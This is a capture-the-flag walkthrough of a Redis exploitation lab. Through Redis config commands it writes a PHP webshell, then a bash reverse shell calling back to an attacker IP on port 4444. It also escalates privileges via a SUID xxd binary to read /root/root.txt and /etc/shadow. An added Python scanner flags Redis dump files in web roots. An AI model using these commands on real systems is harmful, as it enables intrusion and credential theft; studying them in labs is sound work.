Res

January 31, 2024

redis-cli -h 10.10.173.166
LOLWUT
info

As we can see above, there is a user "vianka" in the home directory.

Next, we go to the Redis (port 6379) section of the HackTricks page and adapt its commands for our own purpose:

config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

When we visit the page in the web browser, it returns this line:

http://10.10.173.166/redis.php

Now we can try other commands, such as cmd, in the Redis CLI.

Then we navigate to the browser once again:

http://10.10.173.166/redis.php?cmd=cat /etc/passwd

After that, we set up a reverse shell so that we can get a shell from the web browser:

config set dir /var/www/html
config set dbfilename shell.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.9.135.209/4444 0>&1'\"); ?>"
save

Then we just execute the reverse shell from the web browser.
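
From the defender's side, both files written above (redis.php and shell.php) are Redis RDB dumps, so they start with the REDIS magic header rather than with PHP. The Python sweep below is an added example, not part of the original write-up; the extension list, the function names and the sample bytes are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Every RDB dump begins with the ASCII magic "REDIS" plus a 4-digit version.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
SCRIPT_EXT = {".php", ".phtml", ".phar"}  # assumed list of handler-mapped extensions

def scan_webroot(root):
    """Flag files under root whose first bytes are an RDB header."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)  # header plus first 1 MiB of payload
            except OSError:
                continue  # unreadable file: skip, do not abort the sweep
            if not RDB_MAGIC.match(data):
                continue
            findings.append({
                "path": os.path.relpath(path, root),
                "executable_ext": os.path.splitext(name)[1].lower() in SCRIPT_EXT,
                "php_tag": b"<?php" in data,
            })
    return sorted(findings, key=lambda f: f["path"])

def demo():
    """Run the scan over constructed sample files in a temporary directory."""
    # Constructed bytes imitating an RDB layout; not a real dump.
    rdb = b"REDIS0009\xfe\x00\x00\x04test\x13<?php phpinfo(); ?>\xff"
    samples = {
        "redis.php": rdb,                             # the case from the write-up
        "index.php": b"<?php echo 'home'; ?>",        # ordinary page, must not match
        "backup/dump.rdb": b"REDIS0009\xfe\x00\xff",  # misplaced dump, no PHP
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, content in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(content)
        return scan_webroot(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A hit with both executable_ext and php_tag set is the pattern this room produces; any RDB file under a web root is worth reviewing, since Redis should not be able to write there at all.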

Use these commands to get a better shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Then run the following find command to discover SUID binaries that we can use:

find / -perm -u=s -type f 2>/dev/null

Then we navigate to GTFOBins to look up the xxd command:

xxd "/root/root.txt" | xxd -r
xxd "/etc/shadow" | xxd -r

Alternatively, we can switch to the user vianka and check what that user is permitted to run.
